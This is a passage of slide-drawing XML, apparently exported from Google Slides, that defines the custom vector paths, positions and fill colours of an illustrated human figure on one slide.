            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="29290" h="3823" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1310"/>
                    <a:pt x="5668" y="3822"/>
                    <a:pt x="15443" y="3822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25230" y="3822"/>
                    <a:pt x="29290" y="1310"/>
                    <a:pt x="29290" y="1310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16252" y="0"/>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2" name="Google Shape;79;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1944598" y="1693805"/>
              <a:ext cx="632885" cy="1078224"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15550" h="26492" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7870" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="131" y="3787"/>
                    <a:pt x="131" y="7335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10907"/>
                    <a:pt x="0" y="21860"/>
                    <a:pt x="1977" y="26492"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13657" y="26492"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15348" y="23587"/>
                    <a:pt x="15550" y="10918"/>
                    <a:pt x="15550" y="7370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15550" y="3822"/>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="7870" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="03172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3" name="Google Shape;80;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657416" y="3209578"/>
              <a:ext cx="399348" cy="940170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9812" h="23100" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="310" y="5215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287" y="15097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="20014"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20014"/>
                    <a:pt x="897" y="23099"/>
                    <a:pt x="1032" y="23099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="23099"/>
                    <a:pt x="1035" y="23099"/>
                    <a:pt x="1036" y="23098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="23039"/>
                    <a:pt x="8978" y="18074"/>
                    <a:pt x="9395" y="16038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9811" y="14002"/>
                    <a:pt x="7287" y="0"/>
                    <a:pt x="7287" y="0"/>
                  </a:cubicBez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4" name="Google Shape;81;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425104" y="3226997"/>
              <a:ext cx="400814" cy="942124"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9848" h="23148" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2835" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="1"/>
                    <a:pt x="1" y="13538"/>
                    <a:pt x="418" y="15562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="834" y="17610"/>
                    <a:pt x="8704" y="23087"/>
                    <a:pt x="8823" y="23146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8825" y="23147"/>
                    <a:pt x="8826" y="23148"/>
                    <a:pt x="8828" y="23148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8963" y="23148"/>
                    <a:pt x="9847" y="20063"/>
                    <a:pt x="9847" y="20063"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5561" y="15145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9538" y="5263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0E263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5" name="Google Shape;82;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1367473" y="2660053"/>
              <a:ext cx="1682009" cy="2371589"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41327" h="58270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="17026" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17026" y="0"/>
                    <a:pt x="9489" y="2917"/>
                    <a:pt x="6930" y="4656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3524" y="6966"/>
                    <a:pt x="107" y="15717"/>
                    <a:pt x="0" y="18515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18515"/>
                    <a:pt x="4929" y="19693"/>
                    <a:pt x="9156" y="20836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9275" y="22872"/>
                    <a:pt x="9192" y="25194"/>
                    <a:pt x="8799" y="27873"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8585" y="29230"/>
                    <a:pt x="6179" y="44482"/>
                    <a:pt x="5298" y="52090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5239" y="52566"/>
                    <a:pt x="6358" y="53614"/>
                    <a:pt x="6299" y="54067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6120" y="55543"/>
                    <a:pt x="5906" y="57150"/>
                    <a:pt x="6096" y="57436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6346" y="57817"/>
                    <a:pt x="13299" y="58270"/>
                    <a:pt x="21443" y="58270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28730" y="58270"/>
                    <a:pt x="35147" y="57615"/>
                    <a:pt x="35421" y="57353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35671" y="57162"/>
                    <a:pt x="35445" y="56210"/>
                    <a:pt x="35338" y="54531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35326" y="54186"/>
                    <a:pt x="36445" y="53305"/>
                    <a:pt x="36409" y="52924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36017" y="46613"/>
                    <a:pt x="33873" y="32183"/>
                    <a:pt x="33814" y="31326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33552" y="27218"/>
                    <a:pt x="33683" y="23813"/>
                    <a:pt x="33992" y="20967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38576" y="20265"/>
                    <a:pt x="41327" y="15955"/>
                    <a:pt x="41327" y="15955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41208" y="12633"/>
                    <a:pt x="39803" y="7489"/>
                    <a:pt x="37005" y="5715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35135" y="4037"/>
                    <a:pt x="28349" y="1263"/>
                    <a:pt x="26480" y="715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25721" y="492"/>
                    <a:pt x="25006" y="422"/>
                    <a:pt x="24298" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23141" y="422"/>
                    <a:pt x="22001" y="607"/>
                    <a:pt x="20706" y="607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19621" y="607"/>
                    <a:pt x="18427" y="477"/>
                    <a:pt x="17026"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6" name="Google Shape;83;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053022" y="2400797"/>
              <a:ext cx="384615" cy="318925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9450" h="7836" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="587" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="587" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="599" y="1477"/>
                    <a:pt x="492" y="4513"/>
                    <a:pt x="182" y="6370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7389"/>
                    <a:pt x="2797" y="7835"/>
                    <a:pt x="5353" y="7835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7485" y="7835"/>
                    <a:pt x="9449" y="7525"/>
                    <a:pt x="9374" y="6978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9255" y="6644"/>
                    <a:pt x="8909" y="2549"/>
                    <a:pt x="9016" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="587" y="1"/>
                  </a:ln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7" name="Google Shape;84;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2076873" y="2363963"/>
              <a:ext cx="343142" cy="217135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8431" h="5335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="8430" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="906"/>
                    <a:pt x="72" y="1441"/>
                    <a:pt x="13" y="2382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="2382"/>
                    <a:pt x="2525" y="5335"/>
                    <a:pt x="4311" y="5335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6097" y="5335"/>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8395" y="2596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8347" y="775"/>
                    <a:pt x="8430" y="1"/>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8" name="Google Shape;85;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2493640" y="1956032"/>
              <a:ext cx="179528" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4411" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2769" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="0"/>
                    <a:pt x="2540" y="11"/>
                    <a:pt x="2417" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1215" y="273"/>
                    <a:pt x="405" y="1035"/>
                    <a:pt x="203" y="2559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4094"/>
                    <a:pt x="762" y="4904"/>
                    <a:pt x="1691" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1833" y="5455"/>
                    <a:pt x="1976" y="5489"/>
                    <a:pt x="2117" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3105" y="5489"/>
                    <a:pt x="4040" y="3818"/>
                    <a:pt x="4227" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4411" y="1081"/>
                    <a:pt x="3868" y="0"/>
                    <a:pt x="2769"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19" name="Google Shape;86;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2572150" y="1956113"/>
              <a:ext cx="78999" cy="49817"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1941" h="1224" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="820" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="0"/>
                    <a:pt x="155" y="140"/>
                    <a:pt x="155" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="536"/>
                    <a:pt x="784" y="318"/>
                    <a:pt x="1254" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1565" y="318"/>
                    <a:pt x="1836" y="414"/>
                    <a:pt x="1941" y="533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="533"/>
                    <a:pt x="1715" y="116"/>
                    <a:pt x="1072" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="984" y="6"/>
                    <a:pt x="900" y="0"/>
                    <a:pt x="820"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0" name="Google Shape;87;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852779" y="1956520"/>
              <a:ext cx="179080" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4400" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="0"/>
                    <a:pt x="1" y="1081"/>
                    <a:pt x="185" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="3818"/>
                    <a:pt x="1306" y="5489"/>
                    <a:pt x="2294" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2436" y="5489"/>
                    <a:pt x="2579" y="5455"/>
                    <a:pt x="2721" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3638" y="4904"/>
                    <a:pt x="4400" y="4094"/>
                    <a:pt x="4209" y="2570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3995" y="1034"/>
                    <a:pt x="3197" y="284"/>
                    <a:pt x="1971" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="11"/>
                    <a:pt x="1735" y="0"/>
                    <a:pt x="1625"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1" name="Google Shape;88;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1874798" y="1956764"/>
              <a:ext cx="79039" cy="49613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1942" h="1219" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1099" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1026" y="0"/>
                    <a:pt x="949" y="5"/>
                    <a:pt x="870" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="124"/>
                    <a:pt x="1" y="540"/>
                    <a:pt x="1" y="540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="420"/>
                    <a:pt x="383" y="321"/>
                    <a:pt x="699" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1167" y="321"/>
                    <a:pt x="1722" y="537"/>
                    <a:pt x="1942" y="1219"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1787" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="136"/>
                    <a:pt x="1491" y="0"/>
                    <a:pt x="1099"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2" name="Google Shape;89;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1948953" y="1581881"/>
              <a:ext cx="628530" cy="659544"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15443" h="16205" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7728" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3453" y="0"/>
                    <a:pt x="1" y="2750"/>
                    <a:pt x="1" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12752"/>
                    <a:pt x="3453" y="16204"/>
                    <a:pt x="7728" y="16204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11990" y="16204"/>
                    <a:pt x="15443" y="12752"/>
                    <a:pt x="15443" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15443" y="2870"/>
                    <a:pt x="11978" y="0"/>
                    <a:pt x="7728"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3" name="Google Shape;90;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1947976" y="1926891"/>
              <a:ext cx="629507" cy="577777"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15467" h="14196" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="15467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4156"/>
                    <a:pt x="1" y="7608"/>
                    <a:pt x="1584" y="9859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2489" y="11156"/>
                    <a:pt x="4775" y="13419"/>
                    <a:pt x="6537" y="14038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6813" y="14132"/>
                    <a:pt x="7390" y="14196"/>
                    <a:pt x="7901" y="14196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8228" y="14196"/>
                    <a:pt x="8528" y="14170"/>
                    <a:pt x="8704" y="14109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10490" y="13514"/>
                    <a:pt x="12943" y="11192"/>
                    <a:pt x="13895" y="9847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15467" y="7597"/>
                    <a:pt x="15467" y="4144"/>
                    <a:pt x="15467"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4" name="Google Shape;91;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2346794" y="2016511"/>
              <a:ext cx="137647" cy="28287"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3382" h="695" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2477" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2191" y="25"/>
                    <a:pt x="1918" y="37"/>
                    <a:pt x="1656" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="120"/>
                    <a:pt x="1120" y="168"/>
                    <a:pt x="846" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="322"/>
                    <a:pt x="334" y="406"/>
                    <a:pt x="72" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="537"/>
                    <a:pt x="1" y="584"/>
                    <a:pt x="36" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="670"/>
                    <a:pt x="89" y="695"/>
                    <a:pt x="138" y="695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="695"/>
                    <a:pt x="157" y="694"/>
                    <a:pt x="167" y="692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="620"/>
                    <a:pt x="667" y="549"/>
                    <a:pt x="929" y="501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="453"/>
                    <a:pt x="1441" y="394"/>
                    <a:pt x="1703" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="334"/>
                    <a:pt x="2215" y="299"/>
                    <a:pt x="2489" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2751" y="263"/>
                    <a:pt x="3013" y="263"/>
                    <a:pt x="3275" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="263"/>
                    <a:pt x="3382" y="215"/>
                    <a:pt x="3382" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3382" y="108"/>
                    <a:pt x="3346" y="61"/>
                    <a:pt x="3287" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3025" y="25"/>
                    <a:pt x="2739" y="1"/>
                    <a:pt x="2477"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5" name="Google Shape;92;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2023596" y="2020541"/>
              <a:ext cx="137159" cy="19780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3370" h="486" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1280" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="0"/>
                    <a:pt x="1006" y="3"/>
                    <a:pt x="869" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="607" y="21"/>
                    <a:pt x="334" y="69"/>
                    <a:pt x="72" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="128"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="283"/>
                    <a:pt x="36" y="319"/>
                    <a:pt x="95" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="307"/>
                    <a:pt x="619" y="283"/>
                    <a:pt x="893" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="283"/>
                    <a:pt x="1405" y="283"/>
                    <a:pt x="1679" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="307"/>
                    <a:pt x="2203" y="343"/>
                    <a:pt x="2465" y="366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2715" y="402"/>
                    <a:pt x="2989" y="438"/>
                    <a:pt x="3239" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3298" y="485"/>
                    <a:pt x="3358" y="462"/>
                    <a:pt x="3346" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3370" y="366"/>
                    <a:pt x="3346" y="307"/>
                    <a:pt x="3286" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3024" y="200"/>
                    <a:pt x="2762" y="140"/>
                    <a:pt x="2489" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2227" y="57"/>
                    <a:pt x="1965" y="21"/>
                    <a:pt x="1691" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1554" y="3"/>
                    <a:pt x="1417" y="0"/>
                    <a:pt x="1280"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6" name="Google Shape;93;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191728" y="2273977"/>
              <a:ext cx="142979" cy="31909"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3513" h="784" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1818" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="655" y="66"/>
                    <a:pt x="405" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="402"/>
                    <a:pt x="1298" y="783"/>
                    <a:pt x="1739" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2203" y="783"/>
                    <a:pt x="3513" y="438"/>
                    <a:pt x="3096" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2893" y="60"/>
                    <a:pt x="2363" y="0"/>
                    <a:pt x="1818"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7" name="Google Shape;94;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2206258" y="2424565"/>
              <a:ext cx="115385" cy="10216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2835" h="251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1382" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1013" y="0"/>
                    <a:pt x="1" y="131"/>
                    <a:pt x="346" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="238"/>
                    <a:pt x="906" y="155"/>
                    <a:pt x="1370" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="155"/>
                    <a:pt x="2501" y="250"/>
                    <a:pt x="2501" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="155"/>
                    <a:pt x="1775" y="12"/>
                    <a:pt x="1382" y="0"/>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8" name="Google Shape;95;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2151028" y="2349067"/>
              <a:ext cx="225844" cy="30077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5549" h="739" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2311" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="1"/>
                    <a:pt x="1046" y="324"/>
                    <a:pt x="490" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="324"/>
                    <a:pt x="144" y="290"/>
                    <a:pt x="1" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="526"/>
                    <a:pt x="1696" y="739"/>
                    <a:pt x="3033" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4187" y="739"/>
                    <a:pt x="5284" y="581"/>
                    <a:pt x="5549" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5549" y="200"/>
                  </a:lnTo>
